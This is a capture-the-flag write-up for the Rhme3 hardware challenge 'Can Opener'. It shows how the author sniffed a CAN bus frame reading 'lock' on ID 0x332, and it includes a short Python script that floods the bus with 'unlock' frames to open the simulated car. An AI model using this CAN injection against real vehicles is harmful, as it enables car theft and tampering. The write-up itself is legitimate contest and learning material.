Rhme3

Rhme3 is a hardware capture the flag challenge by riscure and why this project was started. We work so hard on this project that we did not end up solving the challenge during the contest. The solutions on this page will (I ever solved) be done after the fact.

_images/rhme3_front_page.png

Can opener

Can Opener was probably the most easy challenge for 150 points.

_images/rhme3_can_opener.png

https://github.com/alexei-argus/rhme3dash

Using the setup described in Linux setup we can use candump to dump the messages.

One messages is:

slcan0 332 [8] 6C 6F 63 6B 00 00 00 00

Translated to binary:

rax2 -s 6C 6F 63 6B lock

The challenge is to unlock the car using an unlock message. We shutdown scland and write a python script to do so.

from pyvit import can
from pyvit.hw.cantact import CantactDev
import time


dev = CantactDev("/dev/ttyUSB1")
dev.set_bitrate(50000)
dev.start()

def send_frame(id,data):
	frame = can.Frame(id)
	frame.data = data
	dev.send(frame)


d= list(bytearray("unlock\0\0"))

id = 0x332

while True:
	time.sleep(.1)
	send_frame(id,d)
	while dev.available():
		f = dev.recv()
		if f is not None:
			print(f)
_images/can_open_done.png